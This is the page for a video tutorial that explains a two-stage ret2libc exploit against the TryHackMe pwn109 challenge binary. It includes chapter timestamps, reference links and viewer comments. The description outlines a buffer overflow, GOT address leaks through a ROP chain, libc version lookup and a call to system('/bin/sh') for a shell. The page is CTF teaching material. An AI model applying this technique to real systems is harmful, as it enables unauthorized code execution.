Exploiting Return to Libc (ret2libc) tutorial - pwn109 - PWN101

Exploiting Return to Libc (ret2libc) tutorial - pwn109 - PWN101 | TryHackMe

Рет қаралды 5,570

Күн бұрын

Return to libc (ret2libc) fully explained from scratch. In this video we will see and understand how to perform a ret2libc in a multistaged exploit. First, we will abuse a buffer overflow in order to hijack the execution flow and leak addresses from the global offset table (GOT). We will create a tailored ROP chain to jump to PLT, passing as parameters addresses from the GOT. Once we obtained the information we need, we execute once again (second stage) the vulnerable function and, based on the leaked information, we will jump to system() passing as parameter the string "/bin/sh". In order to do so, we will discover the libc version the server is running and jump to specific locations once we leak the dynamically resolved addresses.
Knowledge videos:
Exploiting Return Oriented Programming (ROP) tutorial • Exploiting Return Orie...
Global Offset Table (GOT) and Procedure Linkage Table (PLT) • Global Offset Table (G...
Endianness Explained. Little-Endian and Big-Endian for 32 and 64 bits • Endianness Explained. ...
Additional references about ret2libc:
Wikipedia: en.wikipedia.org/wiki/Return-...
Exploitdb: www.exploit-db.com/docs/engli...
Ired.team: www.ired.team/offensive-secur...
Phrack Magazine: phrack.org/issues/58/4.html
Tools to search for specific libc version:
libc.blukat.me/
libc.nullbyte.cat/
libc.rip/
00:00 - Intro
01:27 - More referenes to learn ret2libc
02:08 - History of ret2libc
03:07 - Disassembling the binary
03:25 - Checking the protections
03:55 - Seeking the vulnerability
04:51 - Spotting the vulnerability
05:32 - Hijacking the execution flow
05:59 - Scenario for ret2libc
06:40 - GOT and PLT
07:25 - How to leak addresses
08:04 - The GOT
08:52 - The PLT
09:54 - Recap
12:00 - ROP
12:38 - What addresses to leak
13:09 - Starting the exploit
13:27 - The puts() function
13:56 - Calling convention
14:25 - Seeking for gadgets
15:22 - Endianness
15:56 - Calling puts()
17:10 - Passing GOT entry as parameter
18:05 - Creating the payload
19:43 - Executing the exploit
20:20 - Improving the exploit
21:53 - u64() vs p64()
23:12 - Executing the exploit
23:28 - Exception or error
24:25 - Executing the exploit remotely
24:42 - Debugging exploit errors
26:00 - Leaking remote addresses
26:25 - ASLR randomization and addresses offsets
27:00 - Leaking server addresses
27:38 - Finding specific libc version
29:11 - Second stage of the exploit
29:35 - Address of system() and /bin/sh
31:28 - Modifying the exploit
32:22 - Calling system("/bin/sh")
33:30 - Executing the exploit
35:10 - Reading the flag
35:24 - Outro[*]
Exploit code, not people.
Twitter: @Razvieu
*Outro track: Etsu - Selcouth
GG

Пікірлер: 26

@RazviOverflow Жыл бұрын

ATTENTION! An editing error has been spotted! Around minute 33:57, the value of the `output` variable is changed (apparently off screen). It went from `output = recvall().split(b" ")` to `output = p.recvuntil(b"ahead").split(b" ")`. Bear in mind that the main purpose of the videos is to help everybody understand what's going on, there is no need of literally copying the exploits shown in the video. There are always several different ways of achieving the same objective, just make sure you do it the ways it is most clear to yourself!

@luxdown7965 Жыл бұрын

This is the most well explained content i've could finded on ret2libc !

@RazviOverflow Жыл бұрын

Thank you :) Glad you liked the video.

@marcovalentinoalvarado3290 Ай бұрын

Each video goes up in quality, thank you so much for sharing!

@RazviOverflow Ай бұрын

You are welcome, thank you :)

@N0RT0X Жыл бұрын

Hostia Razvi, no sabía que ahora te dedicabas a esto. Me viene genial la verdad. Un saludo.

@RazviOverflow Жыл бұрын

Espero que te sean de ayuda los vídeos :)

@lincoln9521 16 күн бұрын

Hello Razvi! Thank you very much for your videos, the explanations are very clear, thanks again 😁

@RazviOverflow 16 күн бұрын

You are more than welcome. I'm happy you like my videos and they help in any way :)

@thedailysenior 10 ай бұрын

Amazing!

@TanNguyenNhat_Ream Жыл бұрын

Thank you

@nguyenhuynhanh4667 5 ай бұрын

Hello, I have a problem at around 23:12 , When I execute the script, the leaked puts address always output 0x0, and the gets address sometimes output 0x50. Do you know the reason why and how to resolve it?

@RazviOverflow 5 ай бұрын

I think 23:40 answers your question.

@luxdown7965 Жыл бұрын

Maybe you should make a discord server ; )

@quinn6021 Жыл бұрын

☺️ քʀօʍօֆʍ

@zawnyeinhtet242 Жыл бұрын

Hello sir, pls any Twitter account? I would like to follow

@RazviOverflow Жыл бұрын

Hi there. Yes, sure. At the end of the description of the video you'll finde one :)

@zawnyeinhtet242 Жыл бұрын

@@RazviOverflow thank u sir

@bhagyalakshmi1053 9 ай бұрын

Banck employees

@user-ul3kv6nv8t 5 ай бұрын

Thank you

@RazviOverflow 5 ай бұрын

You're welcome :)

@user-ul3kv6nv8t 5 ай бұрын

@@RazviOverflow I am a user from China. It is difficult to find such excellent learning materials in China. My English is very poor. I can only use KZfaq's automatic subtitle recognition to understand the meaning. However, KZfaq's automatic recognition sometimes doesn't work well. I couldn't understand some parts of the video. It would be great if the video had Chinese and English subtitles. Finally, thank you so much for making such a great video.我是来自中国的用户。在国内很难找到这么优秀的学习资料。我的英文很差。我只能用KZfaq的自动字幕识别来理解意思。然而，KZfaq 的自动识别有时效果不佳。我无法理解视频中的某些部分。如果视频有中文和英文字幕就太好了。最后，非常感谢您制作了如此精彩的视频。

@RazviOverflow 5 ай бұрын

I'm happy my videos are helping you. Unfortunately, I cannot help with Chinese @@user-ul3kv6nv8t

@dzgamer4832 4 ай бұрын

when will you make more videos ? @@RazviOverflow

@RazviOverflow 4 ай бұрын

@@dzgamer4832As soon as I have the time and something interesting to show :)